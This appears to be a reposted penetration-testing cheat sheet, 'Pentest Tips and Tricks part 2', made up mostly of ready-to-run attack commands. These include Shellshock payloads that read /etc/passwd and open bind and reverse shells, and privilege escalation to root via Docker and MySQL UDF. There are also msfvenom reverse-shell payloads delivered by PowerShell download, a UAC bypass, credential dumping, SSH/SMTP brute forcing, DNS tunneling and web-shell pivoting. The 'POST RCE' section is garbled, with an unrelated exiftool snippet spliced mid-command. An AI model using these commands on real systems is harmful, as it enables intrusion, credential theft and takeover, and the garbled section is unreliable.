Pentest Tips and Tricks（二）

admin

Pentest Handy Tips and Tricks - part 2.

Other Parts

• Part 1
• Part 2
  

Tor Nat Traversal

1. # install to server
   
2. $ apt-get install tor torsocks
   
3. 
   
4. # bind ssh to tor service port 80
   
5. # /etc/tor/torrc
   
6. SocksPolicy accept 127.0.0.1
   
7. SocksPolicy accept 192.168.0.0/16
   
8. Log notice file /var/log/tor/notices.log
   
9. RunAsDaemon 1
   
10. HiddenServiceDir /var/lib/tor/ssh_hidden_service/
    
11. HiddenServicePort 80 127.0.0.1:22
    
12. PublishServerDescriptor 0
    
13. $ /etc/init.d/tor start
    
14. $ cat /var/lib/tor/ssh_hidden_service/hostname
    
15. 3l5zstvt1zk5jhl662.onion
    
16. 
    
17. # ssh connect from client
    
18. $ apt-get install torsocks
    
19. $ torsocks ssh login@3l5zstvt1zk5jhl662.onion -p 80

复制代码

DNS brute forcing with fierce

1. # http://ha.ckers.org/fierce/
   
2. $ ./fierce.pl -dns example.com
   
3. $ ./fierce.pl –dns example.com –wordlist myWordList.txt

复制代码

Metagoofil metadata gathering tool

1. # http://www.edge-security.com/metagoofil.php
   
2. #automate search engine document retrieval and analysis. It also has the capability to provide MAC
   
3. # addresses, username listings, and more
   
4. $ python metagoofil.py -d example.com -t doc,pdf -l 200 -n 50 -o examplefiles -f results.html
   

复制代码

A best NMAP scan strategy

1. # A best nmap scan strategy for networks of all sizes
   
2. 
   
3. # Host Discovery - Generate Live Hosts List
   
4. $ nmap -sn -T4 -oG Discovery.gnmap 192.168.56.0/24
   
5. $ grep "Status: Up" Discovery.gnmap | cut -f 2 -d ' ' > LiveHosts.txt
   
6. 
   
7. # Port Discovery - Most Common Ports
   
8. # http://nmap.org/presentations/BHDC08/bhdc08-slides-fyodor.pdf
   
9. $ nmap -sS -T4 -Pn -oG TopTCP -iL LiveHosts.txt
   
10. $ nmap -sU -T4 -Pn -oN TopUDP -iL LiveHosts.txt
    
11. $ nmap -sS -T4 -Pn --top-ports 3674 -oG 3674 -iL LiveHosts.txt
    
12. 
    
13. # Port Discovery - Full Port Scans (UDP is very slow)
    
14. $ nmap -sS -T4 -Pn -p 0-65535 -oN FullTCP -iL LiveHosts.txt
    
15. $ nmap -sU -T4 -Pn -p 0-65535 -oN FullUDP -iL LiveHosts.txt
    
16. 
    
17. # Print TCP\UDP Ports
    
18. $ grep "open" FullTCP|cut -f 1 -d ' ' | sort -nu | cut -f 1 -d '/' |xargs | sed 's/ /,/g'|awk '{print "T:"$0}'
    
19. $ grep "open" FullUDP|cut -f 1 -d ' ' | sort -nu | cut -f 1 -d '/' |xargs | sed 's/ /,/g'|awk '{print "U:"$0}'
    
20. 
    
21. # Detect Service Version
    
22. $ nmap -sV -T4 -Pn -oG ServiceDetect -iL LiveHosts.txt
    
23. 
    
24. # Operating System Scan
    
25. $ nmap -O -T4 -Pn -oG OSDetect -iL LiveHosts.txt
    
26. 
    
27. # OS and Service Detect
    
28. $ nmap -O -sV -T4 -Pn -p U:53,111,137,T:21-25,80,139,8080 -oG OS_Service_Detect -iL LiveHosts.txt
    

复制代码

Nmap – Techniques for Avoiding Firewalls

1. # fragmentation
   
2. $ nmap -f
   
3. 
   
4. # change default MTU size number must be a multiple of 8 (8,16,24,32 etc)
   
5. $ nmap --mtu 24
   
6. 
   
7. # Generates a random number of decoys
   
8. $ nmap -D RND:10 [target]
   
9. 
   
10. # Manually specify the IP addresses of the decoys
    
11. $ nmap -D decoy1,decoy2,decoy3 etc.
    
12. 
    
13. # Idle Zombie Scan, first t need to find zombie ip
    
14. $ nmap -sI [Zombie IP] [Target IP]
    
15. 
    
16. # Source port number specification
    
17. $ nmap --source-port 80 IP
    
18. 
    
19. # Append Random Data to scan packages
    
20. $ nmap --data-length 25 IP
    
21. 
    
22. # MAC Address Spoofing, generate different mac for host pc
    
23. $ nmap --spoof-mac Dell/Apple/3Com IP
    

复制代码

Exploit servers to Shellshock

1. # A tool to find and exploit servers vulnerable to Shellshock
   
2. # https://github.com/nccgroup/shocker
   
3. $ ./shocker.py -H 192.168.56.118  --command "/bin/cat /etc/passwd" -c /cgi-bin/status --verbose
   
4. 
   
5. # cat file
   
6. $ echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; echo \$(</etc/passwd)\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc 192.168.56.118 80
   
7. 
   
8. # bind shell
   
9. $ echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc 192.168.56.118 80
   
10. 
    
11. # reverse Shell
    
12. $ nc -l -p 443
    
13. $ echo "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc 192.168.56.103 443 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc 192.168.56.118 80
    

复制代码

Root with Docker

1. # get root with docker
   
2. # user must be in docker group
   
3. ek@victum:~/docker-test$ id
   
4. uid=1001(ek) gid=1001(ek) groups=1001(ek),114(docker)
   
5. 
   
6. ek@victum:~$ mkdir docker-test
   
7. ek@victum:~$ cd docker-test
   
8. 
   
9. ek@victum:~$ cat > Dockerfile
   
10. FROM debian:wheezy
    
11. 
    
12. ENV WORKDIR /stuff
    
13. 
    
14. RUN mkdir -p $WORKDIR
    
15. 
    
16. VOLUME [ $WORKDIR ]
    
17. 
    
18. WORKDIR $WORKDIR
    
19. << EOF
    
20. 
    
21. ek@victum:~$ docker build -t my-docker-image .
    
22. ek@victum:~$ docker run -v $PWD:/stuff -t my-docker-image /bin/sh -c \
    
23. 'cp /bin/sh /stuff && chown root.root /stuff/sh && chmod a+s /stuff/sh'
    
24. ./sh
    
25. whoami
    
26. # root
    
27. 
    
28. ek@victum:~$ docker run -v /etc:/stuff -t my-docker-image /bin/sh -c 'cat /stuff/shadow'
    

复制代码

Tunneling Over DNS to Bypass Firewall

1. # Tunneling Data and Commands Over DNS to Bypass Firewalls
   
2. # dnscat2 supports "download" and "upload" commands for getting files (data and programs) to and from # the victim’s host.
   
3. 
   
4. # server (attacker)
   
5. $ apt-get update
   
6. $ apt-get -y install ruby-dev git make g++
   
7. $ gem install bundler
   
8. $ git clone https://github.com/iagox86/dnscat2.git
   
9. $ cd dnscat2/server
   
10. $ bundle install
    
11. $ ruby ./dnscat2.rb
    
12. dnscat2> New session established: 16059
    
13. dnscat2> session -i 16059
    
14. 
    
15. # client (victum)
    
16. # https://downloads.skullsecurity.org/dnscat2/
    
17. # https://github.com/lukebaggett/dnscat2-powershell
    
18. $ dnscat --host <dnscat server_ip>
    

复制代码

Compile Assemble code

1. $ nasm -f elf32 simple32.asm -o simple32.o
   
2. $ ld -m elf_i386 simple32.o simple32
   
3. 
   
4. $ nasm -f elf64 simple.asm -o simple.o
   
5. $ ld simple.o -o simple
   

复制代码

Pivoting to Internal Network Via Non Interactive Shell

1. # generate ssh key with shell
   
2. $ wget -O - -q "http://domain.tk/sh.php?cmd=whoami"
   
3. $ wget -O - -q "http://domain.tk/sh.php?cmd=ssh-keygen -f /tmp/id_rsa -N "" "
   
4. $ wget -O - -q "http://domain.tk/sh.php?cmd=cat /tmp/id_rsa"
   
5. 
   
6. # add tempuser at attacker ps
   
7. $ useradd -m tempuser
   
8. $ mkdir /home/tempuser/.ssh && chmod 700 /home/tempuser/.ssh
   
9. $ wget -O - -q "http://domain.tk/sh.php?cmd=cat /tmp/id_rsa" > /home/tempuser/.ssh/authorized_keys
   
10. $ chmod 700 /home/tempuser/.ssh/authorized_keys
    
11. $ chown -R tempuser:tempuser /home/tempuser/.ssh
    
12. 
    
13. # create reverse ssh shell
    
14. $ wget -O - -q "http://domain.tk/sh.php?cmd=ssh -i /tmp/id_rsa -o StrictHostKeyChecking=no -R 127.0.0.1:8080:192.168.20.13:8080 -N -f tempuser@<attacker_ip>"
    

复制代码

Patator is a multi-purpose brute-forcer

1. # git clone https://github.com/lanjelot/patator.git /usr/share/patator
   
2. 
   
3. # SMTP bruteforce
   
4. $ patator smtp_login host=192.168.17.129 user=Ololena password=FILE0 0=/usr/share/john/password.lst
   
5. $ patator smtp_login host=192.168.17.129 user=FILE1 password=FILE0 0=/usr/share/john/password.lst 1=/usr/share/john/usernames.lst
   
6. $ patator smtp_login host=192.168.17.129 helo='ehlo 192.168.17.128' user=FILE1 password=FILE0 0=/usr/share/john/password.lst 1=/usr/share/john/usernames.lst
   
7. $ patator smtp_login host=192.168.17.129 user=Ololena password=FILE0 0=/usr/share/john/password.lst -x ignore:fgrep='incorrect password or account name'
   

复制代码

Metasploit Web terminal via Gotty

1. $ service postgresql start
   
2. $ msfdb init
   
3. $ apt-get install golang
   
4. $ mkdir /root/gocode
   
5. $ export GOPATH=/root/gocode
   
6. $ go get github.com/yudai/gotty
   
7. $ gocode/bin/gotty -a 127.0.0.1 -w msfconsole
   
8. # open in browser http://127.0.0.1:8080
   

复制代码

Get full shell with POST RCE

1. attacker:~$ curl -i -s -k  -X 'POST' --data-binary [b]Exiftool - Read and write meta information in files[/b][code]$ wget http://www.sno.phy.queensu.ca/~phil/exiftool/Image-ExifTool-10.13.tar.gz
   
2. $ tar xzf Image-ExifTool-10.13.tar.gz
   
3. $ cd Image-ExifTool-10.13
   
4. $ perl Makefile.PL
   
5. $ make
   
6. $ ./exiftool main.gif
   

复制代码

Get SYSTEM with Admin reverse_shell on Win7

1. msfvenom –p windows/shell_reverse_tcp LHOST=192.168.56.102 –f exe > danger.exe
   
2. 
   
3. #show account settings
   
4. net user <login>
   
5. 
   
6. # download psexec to kali
   
7. https://technet.microsoft.com/en-us/sysinternals/bb897553.aspx
   
8. 
   
9. # upload psexec.exe file onto the victim machine with powershell script
   
10. echo $client = New-Object System.Net.WebClient > script.ps1
    
11. echo $targetlocation = "http://192.168.56.102/PsExec.exe" >> script.ps1
    
12. echo $client.DownloadFile($targetlocation,"psexec.exe") >> script.ps1
    
13. powershell.exe -ExecutionPolicy Bypass -NonInteractive -File script.ps1
    
14. 
    
15. # upload danger.exe file onto the victim machine with powershell script
    
16. echo $client = New-Object System.Net.WebClient > script2.ps1
    
17. echo $targetlocation = "http://192.168.56.102/danger.exe" >> script2.ps1
    
18. echo $client.DownloadFile($targetlocation,"danger.exe") >> script2.ps1
    
19. powershell.exe -ExecutionPolicy Bypass -NonInteractive -File script2.ps1
    
20. 
    
21. # UAC bypass from precompiled binaries:
    
22. https://github.com/hfiref0x/UACME
    
23. 
    
24. # upload https://github.com/hfiref0x/UACME/blob/master/Compiled/Akagi64.exe to victim pc with powershell
    
25. echo $client = New-Object System.Net.WebClient > script2.ps1
    
26. echo $targetlocation = "http://192.168.56.102/Akagi64.exe" >> script3.ps1
    
27. echo $client.DownloadFile($targetlocation,"Akagi64.exe") >> script3.ps1
    
28. powershell.exe -ExecutionPolicy Bypass -NonInteractive -File script3.ps1
    
29. 
    
30. # create listener on kali
    
31. nc -lvp 4444
    
32. 
    
33. # Use Akagi64 to run the danger.exe file with SYSTEM privileges
    
34. Akagi64.exe 1 C:\Users\User\Desktop\danger.exe
    
35. 
    
36. # create listener on kali
    
37. nc -lvp 4444
    
38. 
    
39. # The above step should give us a reverse shell with elevated privileges
    
40. # Use PsExec to run the danger.exe file with SYSTEM privileges
    
41. psexec.exe –i –d –accepteula –s danger.exe
    

复制代码

Get SYSTEM with Standard user reverse_shell on Win7

1. https://technet.microsoft.com/en-us/security/bulletin/dn602597.aspx #ms15-051
   
2. https://www.fireeye.com/blog/threat-research/2015/04/probable_apt28_useo.html
   
3. https://www.exploit-db.com/exploits/37049/
   
4. 
   
5. # check the list of patches applied on the target machine
   
6. # to get the list of Hotfixes installed, type in the following command.
   
7. wmic qfe get
   
8. wmic qfe | find "3057191"
   
9. 
   
10. # Upload compile exploit to victim machine and run it
    
11. https://github.com/hfiref0x/CVE-2015-1701/raw/master/Compiled/Taihou64.exe
    
12. 
    
13. # by default exploite exec cmd.exe with SYSTEM privileges, we need to change source code to run danger.exe
    
14. # https://github.com/hfiref0x/CVE-2015-1701 download it and navigate to the file "main.c"
    
15. 
    
16. # dump clear text password of the currently logged in user using wce.exe
    
17. http://www.ampliasecurity.com/research/windows-credentials-editor/
    
18. wce -w
    
19. 
    
20. # dump hashes of other users with pwdump7
    
21. http://www.heise.de/download/pwdump.html
    
22. # we can try online hash cracking tools such crackstation.net
    

复制代码

Generate our own dic file based on the website content

1. $ cewl -m 4 -w dict.txt http://site.url
   
2. $ john --wordlist=dict.txt --rules --stdout
   

复制代码

Bruteforce DNS records using Nmap

1. $ nmap --script dns-brute --script-args dns-brute.domain=foo.com,dns-brute.threads=6,dns-brute.hostlist=./hostfile.txt,newtargets -sS -p 80
   
2. $ nmap --script dns-brute www.foo.com
   

复制代码

Identifying a WAF with Nmap

1. $ nmap -p 80,443 --script=http-waf-detect 192.168.56.102
   
2. $ nmap -p 80,443 --script=http-waf-fingerprint 192.168.56.102
   
3. $ wafw00f www.example.com
   

复制代码

MS08-067 - without the use of Metasploit

1. $ nmap -v -p 139, 445 --script=smb-check-vulns --script-args=unsafe=1 192.168.31.205
   
2. $ searchsploit ms08-067
   
3. $ python /usr/share/exploitdb/platforms/windows/remote/7132.py 192.168.31.205 1
   

复制代码

Nikto scan with SQUID proxy

1. $ nikto -useproxy http://squid_ip:3128 -h http://target_ip
   

复制代码

Hijack a binary’s full path in bash to exec your own code

1. $ function /usr/bin/foo () { /usr/bin/echo "It works"; }
   
2. $ export -f /usr/bin/foo
   
3. $ /usr/bin/foo
   
4. It works
   

复制代码

Local privilege escalation through MySQL run with root privileges

1. # Mysql Server version: 5.5.44-0ubuntu0.14.04.1 (Ubuntu)
   
2. $ wget 0xdeadbeef.info/exploits/raptor_udf2.c
   
3. $ gcc -g -c raptor_udf2.c
   
4. $ gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
   
5. mysql -u root -p
   
6. mysql> use mysql;
   
7. mysql> create table foo(line blob);
   
8. mysql> insert into foo values(load_file('/home/user/raptor_udf2.so'));
   
9. mysql> select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';
   
10. mysql> create function do_system returns integer soname 'raptor_udf2.so';
    
11. mysql> select * from mysql.func;
    
12. mysql> select do_system('echo "root:passwd" | chpasswd > /tmp/out; chown user:user /tmp/out');
    
13. 
    
14. user:~$ su -
    
15. Password:
    
16. user:~# whoami
    
17. root
    
18. root:~# id
    
19. uid=0(root) gid=0(root) groups=0(root)
    

复制代码

Bruteforce SSH login with patator

1. root:~# patator ssh_login host=192.168.0.18 user=FILE0 password=FILE1 0=word.txt 1=word.txt -x ignore:mesg='Authentication failed.'
   

复制代码

Using LD_PRELOAD to inject features to programs

1. $ wget https://github.com/jivoi/pentest/ldpreload_shell.c
   
2. $ gcc -shared -fPIC ldpreload_shell.c -o ldpreload_shell.so
   
3. $ sudo -u user LD_PRELOAD=/tmp/ldpreload_shell.so /usr/local/bin/somesoft
   

复制代码

Exploit the OpenSSH User Enumeration Timing Attack

1. # https://github.com/c0r3dump3d/osueta
   
2. $ ./osueta.py -H 192.168.1.6 -p 22 -U root -d 30 -v yes
   
3. $ ./osueta.py -H 192.168.10.22 -p 22 -d 15 -v yes –dos no -L userfile.txt
   

复制代码

Create a TCP circuit through validly formed HTTP requests with ReDuh

1. # https://github.com/sensepost/reDuh
   
2. 
   
3. # step 1
   
4. # upload reDuh.jsp to victim server
   
5. $ http://192.168.10.50/uploads/reDuh.jsp
   
6. 
   
7. # step 2
   
8. # run reDuhClient on attacker
   
9. $ java -jar reDuhClient.jar http://192.168.10.50/uploads/reDuh.jsp
   
10. 
    
11. # step 3
    
12. # connecting to management port with nc
    
13. $ nc -nvv 127.0.0.1 1010
    
14. 
    
15. # step 4
    
16. # forward localport to remote port with tunnel
    
17. [createTunnel] 7777:172.16.0.4:3389
    
18. 
    
19. # step 5
    
20. # connect to localhost with rdp
    
21. $ /usr/bin/rdesktop -g 1024x768 -P -z -x l -k en-us -r sound:off localhost:7777
    

复制代码